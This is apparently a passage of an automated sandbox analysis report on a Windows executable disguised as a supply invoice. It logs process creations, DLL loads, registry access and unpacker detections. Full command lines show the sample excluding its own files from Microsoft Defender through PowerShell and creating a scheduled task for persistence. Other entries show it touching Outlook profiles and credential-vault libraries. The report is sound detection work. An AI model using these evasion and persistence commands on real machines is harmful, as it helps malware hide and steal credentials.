            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess created: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp68D8.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeProcess created: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe "C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dpqsbGoWdXlp" /XML "C:\Users\user\AppData\Local\Temp\tmp9353.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeProcess created: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe "C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exe"Jump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\dpqsbGoWdXlp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: z1SupplyInvoiceCM60916_Doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: paDa.pdbSHA256 source: z1SupplyInvoiceCM60916_Doc.exe, dpqsbGoWdXlp.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IEFVDUdSaLLhw.exe, 0000000D.00000000.2215877606.0000000000B2E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2301632908.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2299969271.0000000003100000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: z1SupplyInvoiceCM60916_Doc.exe, z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000F.00000002.4578288842.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4578288842.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2301632908.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2299969271.0000000003100000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: paDa.pdb source: z1SupplyInvoiceCM60916_Doc.exe, dpqsbGoWdXlp.exe.0.dr
            Source: Binary string: svchost.pdb source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300268708.0000000001177000.00000004.00000020.00020000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000003.2375679084.0000000000A49000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: z1SupplyInvoiceCM60916_Doc.exe, 0000000B.00000002.2300268708.0000000001177000.00000004.00000020.00020000.00000000.sdmp, IEFVDUdSaLLhw.exe, 0000000D.00000003.2375679084.0000000000A49000.00000004.00000001.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.79a0000.5.raw.unpack, KyybefU7jS1OJapg9Y.cs.Net Code: yN7bnauVQW System.Reflection.Assembly.Load(byte[])
            Source: 0.2.z1SupplyInvoiceCM60916_Doc.exe.477d8e8.3.raw.unpack, KyybefU7jS1OJapg9Y.cs.Net Code: yN7bnauVQW System.Reflection.Assembly.Load(byte[])
